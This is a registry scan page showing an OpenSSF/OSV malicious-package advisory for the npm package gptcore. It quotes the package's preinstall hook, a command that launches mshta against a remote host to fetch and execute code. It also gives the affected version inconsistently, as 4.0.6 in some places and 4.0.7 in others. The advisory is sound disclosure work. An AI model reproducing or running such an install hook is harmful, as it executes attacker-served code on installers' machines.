registry  /  gptcore  /  4.0.6

gptcore@4.0.6

OSV Malicious Advisory

scanned 1h ago · by OpenSSF/OSV

OpenSSF/OSV advisory MAL-2026-10204 confirms this npm version as malicious. gptcore@4.0.7 declares a preinstall lifecycle script that runs `exec('cmd /c "mshta http://fixars.top"')` in preinstall.js. On Windows, this fires automatically during `npm install` and launches mshta.exe against the remote URL http://fixars.top, causing whatever HTA/JScript content that host currently serves to execute on the installer's machine...

Advisory
MAL-2026-10204
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in gptcore (npm)
Details
gptcore@4.0.7 declares a preinstall lifecycle script that runs `exec('cmd /c "mshta http://fixars.top"')` in preinstall.js. On Windows, this fires automatically during `npm install` and launches mshta.exe against the remote URL http://fixars.top, causing whatever HTA/JScript content that host currently serves to execute on the installer's machine. The destination is a hardcoded third-party host over plain HTTP, with no pinning, hash verification, or relationship to a legitimate publisher, and the fetched content is unrelated to any documented package purpose.
Decision reason
OpenSSF Malicious Packages via OSV confirms gptcore@4.0.6 as malicious (MAL-2026-10204): Malicious code in gptcore (npm)

Source & flagged code

0 flagged
No flagged code excerpts are attached to this scan.

Findings

1 High
HighOsv Malicious Advisory